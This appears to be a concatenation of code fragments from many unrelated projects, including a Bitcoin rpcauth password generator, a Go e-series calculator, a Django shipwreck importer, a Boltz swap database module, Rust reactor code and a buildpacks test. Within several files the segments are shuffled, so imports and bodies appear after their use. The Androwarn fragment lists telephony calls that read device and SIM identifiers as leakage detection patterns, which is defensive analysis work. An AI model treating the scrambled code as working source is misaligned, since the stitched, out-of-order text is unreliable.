# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import hashlib | import hmac
if len(sys.argv) < 2:
sys.stderr.write('Please include username as an argument.\n')
sys.exit(1)
username = sys.argv[1]
#This uses os.urandom() underneath
cryptogen = SystemRandom()
#Create 16 byte hex salt
salt_sequence = [cryptogen.randrange(256) for i in range(16)]
hexseq = list(map(hex, salt_sequence))
salt = "".join([x[2:] for x in hexseq])
#Create 32 byte b64 password
password = base64.urlsafe_b64encode(os.urandom(32))
digestmod = hashlib.sha256
if sys.version_info.major >= 3:
password = password.decode('utf-8')
digestmod = 'SHA256'
m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), digestmod)
result = m.hexdigest()
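# The rpcauth credential printed below has the form
#   rpcauth=<username>:<hex salt>$<hmac_sha256(salt, password)>
# so the server config stores only the salt and HMAC digest, never the
# plaintext password (which is printed once for the client to keep).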
print("String to be appended to soiscoin.conf:")
print("rpcauth="+username+":"+salt+"$"+result)
print("Your password:\n"+password) | import sys
import os
from random import SystemRandom
import base64 |
egoParallel.go | package main
import (
"flag"
"fmt"
"log"
"os"
"time"
"github.com/ericlagergren/decimal"
)
var (
precision int
iterations uint64
hard bool
channel chan *decimal.Big
)
func main() {
// Options
precPtr := flag.Int("p", 10001, "Precision for calculations")
iterPtr := flag.Uint64("i", 1625, "Number of series terms to sum (stands in for infinity)")
hard := flag.Bool("hard", false, "Stress your hardware with more iterations! Forces preset iterations and precision, overriding any values set.")
debug := flag.Bool("debug", false, "Used for debugging. This will write to log.txt")
flag.Parse()
// Iterations
precision = *precPtr
iterations = *iterPtr
if *hard {
iterations = 4288
precision = 30001
}
start := time.Now()
channel = make(chan *decimal.Big, iterations)
//go series(0, *iterPtr)
var answer = decimal.WithPrecision(precision).SetUint64(0)
for i := uint64(1); i < iterations; i++ {
go series(i-1, i)
}
for counter := uint64(0); counter < iterations-1; counter++ {
answer = answer.Add(<-channel, answer)
//fmt.Print(".")
//time.Sleep(time.Millisecond*5)
}
// Logging. Only creates log.txt with -debug option
if *debug {
f, err := os.OpenFile("log.txt",
os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
log.Println(err)
}
defer f.Close()
logger := log.New(f, "eGoDecimal ", log.LstdFlags)
// Add things to log for debug here
logger.Println(answer)
logger.Printf("\nRun Time: %v\n", time.Since(start))
}
// Print running time to console
fmt.Printf("Run Time: %v\n", time.Since(start))
}
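// Why the partial sums converge to e (a short derivation, added for clarity):
// (2n+2)/(2n+1)! = 1/(2n)! + 1/(2n+1)!, so summing over n >= 0 gives
// sum_{k>=0} 1/k! = e. Each series(lower, upper) call below evaluates the
// terms in [lower, upper) and sends the partial sum on the buffered channel;
// main drains the channel and accumulates the total.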
func series(lower, upper uint64) |
func factorial(x uint64) (fact *decimal.Big) {
fact = decimal.WithPrecision(precision).SetUint64(1)
//fmt.Println("Prec",fact.Precision())
for i := x; i > 0; i-- {
fact.Mul(fact, decimal.New((int64(i)), 0))
}
//fmt.Println("ActualPrec:",fact.Precision())
return
}
| {
var res = decimal.WithPrecision(precision).SetUint64(0)
for n := lower; n < upper; n++ {
add := decimal.WithPrecision(precision).SetUint64(((2 * n) + 2))
add.Quo(add, factorial((2*n)+1))
res.Add(res, add)
}
channel <- res
} |
import.py | import django
import json
import os
import sys
# Make sure we can see the parent directory to import
sys.path.append('../')
os.environ['DJANGO_SETTINGS_MODULE'] = 'shipwrecks.settings'
# Make sure Django is set up
django.setup()
# Now we can import our Django model(s)
from wrecks.models import Wreck
from wrecks.models import WreckType
from wrecks.models import SOURCE_CHOICES
# Import the GEOS library needed to create points
from django.contrib.gis.geos import Point
from django.contrib.gis.geos import GEOSGeometry
if __name__ == '__main__':
# Make sure we have specified a file to import | sys.exit()
# Open the GeoJSON file
json_filepath = sys.argv[-1]
try:
with open(json_filepath, 'r') as f:
data = json.loads(f.read())
except IOError:
sys.exit("Error opening GeoJSON file")
except ValueError:
sys.exit('Error: the file does not appear to be valid JSON.')
# Turn each feature into a Wreck model instance
for feature_dict in data['features']:
wreck = Wreck()
properties = feature_dict['properties']
# Figure out the source type
source_name = properties['source']
if source_name == 'enc_wrecks':
source = SOURCE_CHOICES[1][0]
else:
source = SOURCE_CHOICES[0][0]
# Figure out if the wreck type exists (and normalize the values)
wreck_type_value = properties['feature_type']
if not wreck_type_value:
wreck_type_value = 'Unknown'
else:
if wreck_type_value.startswith('Wrecks -'):
wreck_type_value = wreck_type_value.replace('Wrecks -', 'Wreck -')
wreck_type, created = WreckType.objects.get_or_create(name=wreck_type_value)
# Figure out the depth
if source_name == 'enc_wrecks':
# ENC Wrecks are always in meters
try:
depth_meters = float(properties['depth'])
except ValueError:
depth_meters = None
else:
if not properties['depth']:
depth_meters = None
else:
depth_value = properties['depth']
sounding = properties['sounding']
if 'meters' in sounding:
depth_meters = depth_value
elif 'feet' in sounding:
# Convert feet and tenths to meters
depth_meters = depth_value * 0.3048
elif 'fathoms' in sounding:
# Convert fathoms to meters
depth_meters = depth_value * 1.8288
else:
depth_meters = None
# Create the Point object from the lat and long
lat = feature_dict['geometry']['coordinates'][1]
lng = feature_dict['geometry']['coordinates'][0]
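# GeoDjango expects a numeric SRID here; EPSG:4269 is the geographic NAD83
# system (the original string 'NADS83' was not a valid srid value).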
location_point = GEOSGeometry('POINT(%f %f)' % (lng, lat), srid=4269)
# Get the name or assign 'unknown'
vessel_name = properties['vessel_name']
if not vessel_name:
vessel_name = 'Unknown'
# Cast the year sunk into an integer
try:
year_sunk = int(properties['yearsunk'])
except ValueError:
year_sunk = None
wreck.name = vessel_name
wreck.history = properties['history']
wreck.wreck_type = wreck_type
wreck.year_sunk = year_sunk
wreck.source = source
wreck.source_identifier = feature_dict['id']
wreck.depth_meters = depth_meters
wreck.location = location_point
# Save the new wreck
wreck.save() | if len(sys.argv) < 2:
print 'You must specify a geojson file to import.'
print 'Usage: $ python import.py <geojson file>' |
swap.go | package database
import (
"database/sql"
"encoding/hex"
"errors"
"github.com/BoltzExchange/boltz-lnd/boltz"
"github.com/BoltzExchange/boltz-lnd/boltzrpc"
"github.com/btcsuite/btcd/btcec"
"strconv"
)
type Swap struct {
Id string
State boltzrpc.SwapState
Error string
Status boltz.SwapUpdateEvent
PrivateKey *btcec.PrivateKey
Preimage []byte
RedeemScript []byte
Invoice string
Address string
ExpectedAmount uint64
TimoutBlockHeight uint32
LockupTransactionId string
RefundTransactionId string
}
type SwapSerialized struct {
Id string
State string
Error string
Status string
PrivateKey string
Preimage string
RedeemScript string
Invoice string
Address string
ExpectedAmount uint64
TimeoutBlockHeight uint32
LockupTransactionId string
RefundTransactionId string
}
func (swap *Swap) Serialize() SwapSerialized {
preimage := ""
if swap.Preimage != nil {
preimage = hex.EncodeToString(swap.Preimage)
}
return SwapSerialized{
Id: swap.Id,
State: boltzrpc.SwapState_name[int32(swap.State)],
Error: swap.Error,
Status: swap.Status.String(),
PrivateKey: formatPrivateKey(swap.PrivateKey),
Preimage: preimage,
RedeemScript: hex.EncodeToString(swap.RedeemScript),
Invoice: swap.Invoice,
Address: swap.Address,
ExpectedAmount: swap.ExpectedAmount,
TimeoutBlockHeight: swap.TimoutBlockHeight,
LockupTransactionId: swap.LockupTransactionId,
RefundTransactionId: swap.RefundTransactionId,
}
}
func | (rows *sql.Rows) (*Swap, error) {
var swap Swap
var status string
var privateKey string
var preimage string
var redeemScript string
err := scanRow(
rows,
map[string]interface{}{
"id": &swap.Id,
"state": &swap.State,
"error": &swap.Error,
"status": &status,
"privateKey": &privateKey,
"preimage": &preimage,
"redeemScript": &redeemScript,
"invoice": &swap.Invoice,
"address": &swap.Address,
"expectedAmount": &swap.ExpectedAmount,
"timeoutBlockheight": &swap.TimoutBlockHeight,
"lockupTransactionId": &swap.LockupTransactionId,
"refundTransactionId": &swap.RefundTransactionId,
},
)
if err != nil {
return nil, err
}
swap.Status = boltz.ParseEvent(status)
privateKeyBytes, err := hex.DecodeString(privateKey)
if err != nil {
return nil, err
}
swap.PrivateKey, _ = parsePrivateKey(privateKeyBytes)
if preimage != "" {
swap.Preimage, err = hex.DecodeString(preimage)
if err != nil {
return nil, err
}
}
swap.RedeemScript, err = hex.DecodeString(redeemScript)
if err != nil {
return nil, err
}
return &swap, err
}
func (database *Database) QuerySwap(id string) (swap *Swap, err error) {
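// Bind the user-supplied id as a query parameter rather than concatenating it
// into the SQL string, to avoid SQL injection.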
rows, err := database.db.Query("SELECT * FROM swaps WHERE id = ?", id)
if err != nil {
return swap, err
}
defer rows.Close()
if rows.Next() {
swap, err = parseSwap(rows)
if err != nil {
return swap, err
}
} else {
return swap, errors.New("could not find Swap " + id)
}
return swap, err
}
func (database *Database) querySwaps(query string) (swaps []Swap, err error) {
rows, err := database.db.Query(query)
if err != nil {
return nil, err
}
defer rows.Close()
for rows.Next() {
swap, err := parseSwap(rows)
if err != nil {
return nil, err
}
swaps = append(swaps, *swap)
}
return swaps, err
}
func (database *Database) QuerySwaps() ([]Swap, error) {
return database.querySwaps("SELECT * FROM swaps")
}
func (database *Database) QueryPendingSwaps() ([]Swap, error) {
return database.querySwaps("SELECT * FROM swaps WHERE state = '" + strconv.Itoa(int(boltzrpc.SwapState_PENDING)) + "'")
}
func (database *Database) QueryRefundableSwaps(currentBlockHeight uint32) ([]Swap, error) {
return database.querySwaps("SELECT * FROM swaps WHERE (state = '" + strconv.Itoa(int(boltzrpc.SwapState_PENDING)) + "' OR state = '" + strconv.Itoa(int(boltzrpc.SwapState_SERVER_ERROR)) + "') AND timeoutBlockHeight <= " + strconv.FormatUint(uint64(currentBlockHeight), 10))
}
func (database *Database) CreateSwap(swap Swap) error {
insertStatement := "INSERT INTO swaps (id, state, error, status, privateKey, preimage, redeemScript, invoice, address, expectedAmount, timeoutBlockheight, lockupTransactionId, refundTransactionId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)"
statement, err := database.db.Prepare(insertStatement)
if err != nil {
return err
}
preimage := ""
if swap.Preimage != nil {
preimage = hex.EncodeToString(swap.Preimage)
}
_, err = statement.Exec(
swap.Id,
swap.State,
swap.Error,
swap.Status.String(),
formatPrivateKey(swap.PrivateKey),
preimage,
hex.EncodeToString(swap.RedeemScript),
swap.Invoice,
swap.Address,
swap.ExpectedAmount,
swap.TimoutBlockHeight,
swap.LockupTransactionId,
swap.RefundTransactionId,
)
if err != nil {
return err
}
return statement.Close()
}
func (database *Database) UpdateSwapState(swap *Swap, state boltzrpc.SwapState, error string) error {
swap.State = state
swap.Error = error
_, err := database.db.Exec("UPDATE swaps SET state = ?, error = ? WHERE id = ?", state, error, swap.Id)
return err
}
func (database *Database) UpdateSwapStatus(swap *Swap, status boltz.SwapUpdateEvent) error {
swap.Status = status
_, err := database.db.Exec("UPDATE swaps SET status = ? WHERE id = ?", status.String(), swap.Id)
return err
}
func (database *Database) SetSwapInvoice(swap *Swap, invoice string) error {
swap.Invoice = invoice
_, err := database.db.Exec("UPDATE swaps SET invoice = ? WHERE id = ?", invoice, swap.Id)
return err
}
func (database *Database) SetSwapLockupTransactionId(swap *Swap, lockupTransactionId string) error {
swap.LockupTransactionId = lockupTransactionId
_, err := database.db.Exec("UPDATE swaps SET lockupTransactionId = ? WHERE id = ?", lockupTransactionId, swap.Id)
return err
}
func (database *Database) SetSwapRefundTransactionId(swap *Swap, refundTransactionId string) error {
swap.State = boltzrpc.SwapState_REFUNDED
swap.RefundTransactionId = refundTransactionId
_, err := database.db.Exec("UPDATE swaps SET state = ?, refundTransactionId = ? WHERE id = ?", swap.State, refundTransactionId, swap.Id)
return err
}
| parseSwap |
telephony_identifiers.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of Androwarn.
#
# Copyright (C) 2012, 2019, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# Androwarn is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androwarn is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androwarn. If not, see <http://www.gnu.org/licenses/>.
# Global imports
import logging
# Androwarn modules import
from lib.warn.util.util import *
# Logger
log = logging.getLogger('log')
def detect_telephony_gsm_GsmCellLocation(x):
"""
@param x : an Analysis instance
@rtype : a list of strings, for example [ 'This application makes phone calls', "This application sends an SMS message 'Premium SMS' to the '12345' phone number" ]
"""
method_listing = [
("getLac()", "This application reads the Location Area Code value"),
("getCid()", "This application reads the Cell ID value")
]
class_name = 'Landroid/telephony/gsm/GsmCellLocation'
return structural_analysis_search_method_bulk(class_name, method_listing, x)
def detect_Telephony_Manager_Leakages(x) :
"""
@param x : an Analysis instance
@rtype : a list of strings, for example [ 'This application makes phone calls', "This application sends an SMS message 'Premium SMS' to the '12345' phone number" ]
"""
method_listing = [
("getCallState()", "This application reads the phone's current state"),
("getCellLocation()", "This application reads the current location of the device"),
("getDataActivity()", "This application reads the type of activity on a data connection"),
("getDataState()", "This application reads the current data connection state"),
("getDeviceId()", "This application reads the unique device ID, i.e the IMEI for GSM and the MEID or ESN for CDMA phones"),
("getDeviceSoftwareVersion()", "This application reads the software version number for the device, for example, the IMEI/SV for GSM phones"),
("getLine1Number()", "This application reads the phone number string for line 1, for example, the MSISDN for a GSM phone"),
("getNeighboringCellInfo()", "This application reads the neighboring cell information of the device"),
("getNetworkCountryIso()", "This application reads the ISO country code equivalent of the current registered operator's MCC (Mobile Country Code)"),
("getNetworkOperator()", "This application reads the numeric name (MCC+MNC) of current registered operator"),
("getNetworkOperatorName()", "This application reads the operator name"),
("getNetworkType()", "This application reads the radio technology (network type) currently in use on the device for data transmission"),
("getPhoneType()", "This application reads the device phone type value"),
("getSimCountryIso()", "This application reads the ISO country code equivalent for the SIM provider's country code"),
("getSimOperator()", "This application reads the MCC+MNC of the provider of the SIM"),
("getSimOperatorName()", "This application reads the Service Provider Name (SPN)"),
("getSimSerialNumber()", "This application reads the SIM's serial number"),
("getSimState()", "This application reads the constant indicating the state of the device SIM card"),
("getSubscriberId()", "This application reads the unique subscriber ID, for example, the IMSI for a GSM phone"),
("getVoiceMailAlphaTag()", "This application reads the alphabetic identifier associated with the voice mail number"),
("getVoiceMailNumber()", "This application reads the voice mail number")
]
class_name = 'Landroid/telephony/TelephonyManager'
return structural_analysis_search_method_bulk(class_name, method_listing, x)
def | (x) :
"""
@param x : an Analysis instance
@rtype : a list of strings for the concerned category, for example [ 'This application makes phone calls', "This application sends an SMS message 'Premium SMS' to the '12345' phone number" ]
"""
result = []
result.extend( detect_Telephony_Manager_Leakages(x) )
result.extend( detect_telephony_gsm_GsmCellLocation(x) )
return result | gather_telephony_identifiers_leakage |
error.rs | /*
* Copyright 2017 Bitwise IO, Inc.
* Copyright 2019 Cargill Incorporated
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* -----------------------------------------------------------------------------
*/
use std::error::Error;
#[derive(Debug)]
pub enum ApplyError {
/// Returned for an Invalid Transaction.
InvalidTransaction(String),
/// Returned when an internal error occurs during transaction processing.
InternalError(String),
}
impl Error for ApplyError {
fn source(&self) -> Option<&(dyn Error + 'static)> {
None
}
}
impl std::fmt::Display for ApplyError {
fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
match *self {
ApplyError::InvalidTransaction(ref s) => write!(f, "InvalidTransaction: {}", s),
ApplyError::InternalError(ref s) => write!(f, "InternalError: {}", s),
}
}
}
#[derive(Debug)]
pub enum ContextError {
/// Returned for an authorization error
AuthorizationError(String),
/// Returned when an error occurs due to missing info in a response
ResponseAttributeError(String),
/// Returned when there is an issue setting receipt data or events.
TransactionReceiptError(String),
/// Returned when a ProtobufError is returned during serialization
SerializationError(Box<dyn Error>),
/// Returned when an error occurs while sending a message
SendError(Box<dyn Error>),
/// Returned when an error occurs while receiving a message
ReceiveError(Box<dyn Error>),
}
impl Error for ContextError {
fn source(&self) -> Option<&(dyn Error + 'static)> {
match self {
ContextError::AuthorizationError(_) => None,
ContextError::ResponseAttributeError(_) => None,
ContextError::TransactionReceiptError(_) => None,
ContextError::SerializationError(err) => Some(&**err),
ContextError::SendError(err) => Some(&**err),
ContextError::ReceiveError(err) => Some(&**err),
}
}
}
impl std::fmt::Display for ContextError {
fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result |
}
impl From<ContextError> for ApplyError {
fn from(context_error: ContextError) -> Self {
match context_error {
ContextError::TransactionReceiptError(..) => {
ApplyError::InternalError(format!("{}", context_error))
}
_ => ApplyError::InvalidTransaction(format!("{}", context_error)),
}
}
}
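// Illustrative example (not part of the original file): the From impl above
// maps receipt failures to InternalError and everything else to
// InvalidTransaction.
//
//     let ctx_err = ContextError::AuthorizationError("missing signer".into());
//     let apply_err: ApplyError = ctx_err.into();
//     // -> ApplyError::InvalidTransaction("AuthorizationError: missing signer")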
| {
match *self {
ContextError::AuthorizationError(ref s) => write!(f, "AuthorizationError: {}", s),
ContextError::ResponseAttributeError(ref s) => {
write!(f, "ResponseAttributeError: {}", s)
}
ContextError::TransactionReceiptError(ref s) => {
write!(f, "TransactionReceiptError: {}", s)
}
ContextError::SerializationError(ref err) => write!(f, "SerializationError: {}", err),
ContextError::SendError(ref err) => write!(f, "SendError: {}", err),
ContextError::ReceiveError(ref err) => write!(f, "ReceiveError: {}", err),
}
} |
reactor.rs | use crate::{
heartbeat::Heartbeat,
socket_state::{SocketEvent, SocketStateHandle},
tcp::TcpStream,
thread::ThreadHandle,
Result,
};
use log::trace;
use mio::{Events, Interest, Poll, Token, Waker};
use std::{
collections::HashMap,
fmt,
sync::{
atomic::{AtomicBool, AtomicUsize, Ordering},
Arc,
},
thread::Builder as ThreadBuilder,
};
pub type Slot = usize;
pub trait ReactorBuilder: fmt::Debug + Send + Sync {
fn build(&self, heartbeat: Heartbeat) -> Result<Box<dyn Reactor + Send>>;
}
pub trait Reactor: fmt::Debug + Send {
fn register(&mut self, socket: &mut TcpStream, socket_state: SocketStateHandle)
-> Result<Slot>;
fn handle(&self) -> Box<dyn ReactorHandle + Send> {
Box::new(DummyHandle)
}
#[allow(clippy::boxed_local)]
fn start(self: Box<Self>) -> Result<ThreadHandle> {
Ok(ThreadHandle::default())
}
}
pub trait ReactorHandle {
fn shutdown(&self) -> Result<()> |
fn start_heartbeat(&self) {}
fn poll_read(&self, _slot: Slot) {}
fn poll_write(&self, _slot: Slot) {}
}
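// Note: every ReactorHandle method has a default body (shutdown's default
// simply returns Ok(()), see the end of this file), so a no-op handle such as
// DummyHandle below can be declared with an empty impl block.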
pub(crate) struct DefaultReactorBuilder;
impl ReactorBuilder for DefaultReactorBuilder {
fn build(&self, heartbeat: Heartbeat) -> Result<Box<dyn Reactor + Send>> {
Ok(Box::new(DefaultReactor::new(heartbeat)?))
}
}
pub(crate) struct DefaultReactor {
slot: AtomicUsize,
poll: Poll,
heartbeat: Heartbeat,
slots: HashMap<Token, SocketStateHandle>,
handle: DefaultReactorHandle,
}
#[derive(Clone)]
pub(crate) struct DefaultReactorHandle {
run: Arc<AtomicBool>,
waker: Arc<Waker>,
}
impl Reactor for DefaultReactor {
fn handle(&self) -> Box<dyn ReactorHandle + Send> {
Box::new(self.handle.clone())
}
fn register(
&mut self,
socket: &mut TcpStream,
socket_state: SocketStateHandle,
) -> Result<usize> {
let token = Token(self.slot.fetch_add(1, Ordering::SeqCst));
self.poll
.registry()
.register(socket, token, Interest::READABLE | Interest::WRITABLE)?;
self.slots.insert(token, socket_state);
Ok(token.0)
}
fn start(mut self: Box<Self>) -> Result<ThreadHandle> {
Ok(ThreadHandle::new(
ThreadBuilder::new()
.name("lapin-reactor".into())
.spawn(move || {
let mut events = Events::with_capacity(16);
while self.should_run() {
self.run(&mut events)?;
}
Ok(())
})?,
))
}
}
impl DefaultReactor {
fn new(heartbeat: Heartbeat) -> Result<Self> {
let poll = Poll::new()?;
let handle = DefaultReactorHandle {
run: Arc::new(AtomicBool::new(true)),
waker: Arc::new(Waker::new(poll.registry(), Token(0))?),
};
Ok(Self {
slot: AtomicUsize::new(1),
poll,
heartbeat,
slots: HashMap::default(),
handle,
})
}
fn should_run(&self) -> bool {
self.handle.run.load(Ordering::SeqCst)
}
fn run(&mut self, events: &mut Events) -> Result<()> {
trace!("reactor poll");
self.poll.poll(events, self.heartbeat.poll_timeout())?;
trace!("reactor poll done");
for event in events.iter() {
if let Some(socket) = self.slots.get(&event.token()) {
if event.is_error() {
socket.send(SocketEvent::Error);
}
if event.is_read_closed() || event.is_write_closed() {
socket.send(SocketEvent::Closed);
}
if event.is_readable() {
socket.send(SocketEvent::Readable);
}
if event.is_writable() {
socket.send(SocketEvent::Writable);
}
}
}
Ok(())
}
}
impl ReactorHandle for DefaultReactorHandle {
fn shutdown(&self) -> Result<()> {
self.run.store(false, Ordering::SeqCst);
self.waker.wake()?;
Ok(())
}
}
impl fmt::Debug for DefaultReactorBuilder {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("DefaultReactorBuilder").finish()
}
}
impl fmt::Debug for DefaultReactor {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("DefaultReactor").finish()
}
}
#[derive(Clone)]
struct DummyHandle;
impl ReactorHandle for DummyHandle {}
| {
Ok(())
} |
upload.go | package cli
import (
"os"
"github.com/pkg/errors"
"github.com/replicatedhq/kots/pkg/logger"
"github.com/replicatedhq/kots/pkg/upload"
"github.com/spf13/cobra"
"github.com/spf13/viper"
)
func UploadCmd() *cobra.Command | {
cmd := &cobra.Command{
Use: "upload [source]",
Short: "Upload Kubernetes manifests from the local filesystem to your cluster",
Long: `Upload Kubernetes manifests from the local filesystem to a cluster, creating a new version of the application that can be deployed.`,
SilenceUsage: true,
SilenceErrors: false,
PreRun: func(cmd *cobra.Command, args []string) {
viper.BindPFlags(cmd.Flags())
},
RunE: func(cmd *cobra.Command, args []string) error {
v := viper.GetViper()
if len(args) == 0 {
cmd.Help()
os.Exit(1)
}
log := logger.NewLogger()
sourceDir := homeDir()
if len(args) > 0 {
sourceDir = ExpandDir(args[0])
}
uploadOptions := upload.UploadOptions{
Namespace: v.GetString("namespace"),
Kubeconfig: v.GetString("kubeconfig"),
ExistingAppSlug: v.GetString("slug"),
NewAppName: v.GetString("name"),
UpstreamURI: v.GetString("upstream-uri"),
Endpoint: "http://localhost:3000",
}
stopCh := make(chan struct{})
defer close(stopCh)
errChan, err := upload.StartPortForward(uploadOptions.Namespace, uploadOptions.Kubeconfig, stopCh)
if err != nil {
return errors.Wrap(err, "failed to port forward")
}
go func() {
select {
case err := <-errChan:
if err != nil {
log.Error(err)
os.Exit(-1)
}
case <-stopCh:
}
}()
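// The goroutine above surfaces port-forward errors without blocking the
// upload; the deferred close(stopCh) unblocks it cleanly on return.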
if err := upload.Upload(sourceDir, uploadOptions); err != nil {
return errors.Cause(err)
}
return nil
},
}
cmd.Flags().String("kubeconfig", defaultKubeConfig(), "the kubeconfig to use")
cmd.Flags().StringP("namespace", "n", "default", "the namespace to upload to")
cmd.Flags().String("slug", "", "the application slug to use. if not present, a new one will be created")
cmd.Flags().String("name", "", "the name of the kotsadm application to create")
cmd.Flags().String("upstream-uri", "", "the upstream uri that can be used to check for updates")
return cmd
} |
|
extremevalue.py | #
# Generated with ExtremeValueBlueprint | from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from sima.sima.blueprints.moao import MOAOBlueprint
class ExtremeValueBlueprint(MOAOBlueprint):
""""""
def __init__(self, name="ExtremeValue", package_path="sima/metocean", description=""):
super().__init__(name,package_path,description)
self.attributes.append(Attribute("name","string","",default=""))
self.attributes.append(Attribute("description","string","",default=""))
self.attributes.append(Attribute("_id","string","",default=""))
self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
self.attributes.append(Attribute("extreme","number","",default=0.0))
self.attributes.append(Attribute("returnPeriod","number","",default=0.0)) | from dmt.blueprint import Blueprint |
lifecycle_execution_test.go | package build_test
import (
"bytes"
"context"
"fmt"
"io/ioutil"
"math/rand"
"os"
"path/filepath"
"testing"
"time"
"github.com/buildpacks/pack/internal/cache"
"github.com/google/go-containerregistry/pkg/name"
"github.com/apex/log"
"github.com/buildpacks/lifecycle/api"
"github.com/docker/docker/api/types/container"
"github.com/docker/docker/client"
"github.com/heroku/color"
"github.com/sclevine/spec"
"github.com/sclevine/spec/report"
"github.com/buildpacks/pack/internal/build"
"github.com/buildpacks/pack/internal/build/fakes"
ilogging "github.com/buildpacks/pack/internal/logging"
h "github.com/buildpacks/pack/testhelpers"
)
// TestLifecycleExecution contains unit tests that exercise each possible phase to ensure it is executed with the proper parameters
func TestLifecycleExecution(t *testing.T) {
rand.Seed(time.Now().UTC().UnixNano())
color.Disable(true)
defer color.Disable(false)
spec.Run(t, "phases", testLifecycleExecution, spec.Report(report.Terminal{}), spec.Sequential())
}
func testLifecycleExecution(t *testing.T, when spec.G, it spec.S) {
// Avoid contaminating tests with existing docker configuration.
// GGCR resolves the default keychain by inspecting DOCKER_CONFIG - this is used by the Analyze step
// when constructing the auth config (see `auth.BuildEnvVar` in phases.go).
var dockerConfigDir string
it.Before(func() {
var err error
dockerConfigDir, err = ioutil.TempDir("", "empty-docker-config-dir")
h.AssertNil(t, err)
h.AssertNil(t, os.Setenv("DOCKER_CONFIG", dockerConfigDir))
})
it.After(func() {
h.AssertNil(t, os.Unsetenv("DOCKER_CONFIG"))
h.AssertNil(t, os.RemoveAll(dockerConfigDir))
})
when("#NewLifecycleExecution", func() {
when("lifecycle supports multiple platform APIs", func() {
it("select the latest supported version", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{
api.MustParse("0.2"),
api.MustParse("0.3"),
api.MustParse("0.4"),
api.MustParse("0.5"),
api.MustParse("0.6"),
}))
h.AssertNil(t, err)
lifecycleExec := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
h.AssertEq(t, lifecycleExec.PlatformAPI().String(), "0.6")
})
})
when("supported platform API is deprecated", func() {
it("select the deprecated version", func() {
fakeBuilder, err := fakes.NewFakeBuilder(
fakes.WithDeprecatedPlatformAPIs([]*api.Version{api.MustParse("0.4")}),
fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("1.2")}),
)
h.AssertNil(t, err)
lifecycleExec := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
h.AssertEq(t, lifecycleExec.PlatformAPI().String(), "0.4")
})
})
when("pack doesn't support any lifecycle supported platform API", func() {
it("errors", func() {
fakeBuilder, err := fakes.NewFakeBuilder(
fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("1.2")}),
)
h.AssertNil(t, err)
_, err = newTestLifecycleExecErr(t, false, fakes.WithBuilder(fakeBuilder))
h.AssertError(t, err, "unable to find a supported Platform API version")
})
})
})
when("Run", func() {
var (
imageName name.Tag
fakeBuilder *fakes.FakeBuilder
outBuf bytes.Buffer
logger *ilogging.LogWithWriters
docker *client.Client
fakePhaseFactory *fakes.FakePhaseFactory
)
it.Before(func() {
var err error
imageName, err = name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
fakeBuilder, err = fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
logger = ilogging.NewLogWithWriters(&outBuf, &outBuf)
docker, err = client.NewClientWithOpts(client.FromEnv, client.WithVersion("1.38"))
h.AssertNil(t, err)
fakePhaseFactory = fakes.NewFakePhaseFactory()
})
when("Run using creator", func() {
it("succeeds", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: false,
UseCreator: true,
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts)
h.AssertNil(t, err)
h.AssertEq(t, filepath.Base(lifecycle.AppDir()), "workspace")
err = lifecycle.Run(context.Background(), func(execution *build.LifecycleExecution) build.PhaseFactory {
return fakePhaseFactory
})
h.AssertNil(t, err)
h.AssertEq(t, len(fakePhaseFactory.NewCalledWithProvider), 1)
for _, entry := range fakePhaseFactory.NewCalledWithProvider {
if entry.Name() == "creator" {
h.AssertSliceContains(t, entry.ContainerConfig().Cmd, "/some/image")
}
}
})
when("Run with workspace dir", func() {
it("succeeds", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: true,
Workspace: "app",
UseCreator: true,
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts)
h.AssertNil(t, err)
err = lifecycle.Run(context.Background(), func(execution *build.LifecycleExecution) build.PhaseFactory {
return fakePhaseFactory
})
h.AssertNil(t, err)
h.AssertEq(t, len(fakePhaseFactory.NewCalledWithProvider), 1)
for _, entry := range fakePhaseFactory.NewCalledWithProvider {
if entry.Name() == "creator" {
h.AssertSliceContainsInOrder(t, entry.ContainerConfig().Cmd, "-app", "/app")
